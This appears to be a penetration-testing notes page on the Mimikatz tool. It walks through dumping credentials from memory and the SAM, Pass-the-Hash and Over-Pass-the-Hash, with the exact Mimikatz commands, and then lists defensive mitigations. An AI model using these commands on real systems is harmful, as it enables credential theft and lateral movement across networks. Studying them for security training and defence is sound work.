Mimikatz

Mimikatz#

  • Mimikatz is a powerful post-exploitation tool used to view and steal credentials, generate Kerberos tickets, and leverage advanced attacks.

  • It can dump credentials stored in memory, including plaintext passwords, password hashes, and Kerberos tickets.

  • Highly detectable by antivirus solutions, but devastating when AV is disabled, bypassed, or the tool is obfuscated.

  • Enables multiple attack vectors: Credential Dumping, Pass-the-Hash, Over-Pass-the-Hash, Silver Ticket, and Golden Ticket attacks.

  • Source: https://github.com/gentilkiwi/mimikatz

Credential Dumping#

Walkthrough#

  1. Transfer Mimikatz to the Victim Machine

Using any file transfer method (e.g., SMB, HTTP, or direct copy), place mimikatz.exe on the target system.

  1. Execute Mimikatz with Elevated Privileges

Open an elevated command prompt or PowerShell session and run Mimikatz:

mimikatz.exe

  1. Enable Debug Privileges

Within the Mimikatz prompt, first enable debug privileges to access protected memory:

mimikatz # privilege::debug

  1. Dump Credentials from Memory

Extract all cached credentials and plaintext passwords stored in memory:

mimikatz # sekurlsa::logonPasswords

This command displays credentials including:

  • Plaintext passwords (if stored by applications like browsers, Remote Desktop, or credential manager)

  • NTLM hashes of user accounts

  • Kerberos tickets (TGT and TGS)

  • Plain passwords from Credential Manager (Credman)

  1. Extract Additional Credential Stores

Dump credentials from Local Security Authority (LSA):

mimikatz # lsadump::sam

Pass-the-Hash (PtH)#

Once you obtain NTLM hashes, use Mimikatz to inject them into the current session and authenticate as another user without knowing their password:

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash>

This creates a new process running with the stolen hash, allowing lateral movement across the domain.

Over-Pass-the-Hash#

Request a new Kerberos TGT using the user’s NTLM hash:

mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:powershell.exe

Within the new PowerShell session, request a TGT:

Invoke-Mimikatz -Command '"kerberos::ask /tgt"'

This bypasses password requirements while maintaining Kerberos authentication.

Mitigations#

  • Endpoint Detection and Response (EDR): Deploy EDR solutions that detect Mimikatz execution and credential access patterns at runtime.

  • Disable Unnecessary Services: Disable services and features that hold plaintext credentials in memory (e.g., WDigest).

  • Credential Guard: Enable Windows Defender Credential Guard to isolate and protect credentials in memory on Windows 10/11 and Server 2016+.

  • Restrict Administrator Access: Limit the number of accounts with administrative privileges and implement Just-In-Time (JIT) admin access.

  • Monitor Memory Access: Use tools like Sysmon to log suspicious memory access and command execution patterns.

  • Patch Regularly: Apply security patches promptly to address vulnerabilities that Mimikatz exploits.

  • Multi-Factor Authentication (MFA): Enforce MFA to prevent Pass-the-Hash and Over-Pass-the-Hash attacks.

  • Audit Kerberos Ticket Requests: Monitor for unusual TGT and TGS requests that may indicate forged tickets.

  • Protected Accounts: Place sensitive accounts (e.g., krbtgt, Domain Admins) in the “Protected Users” security group to restrict delegation and impersonation.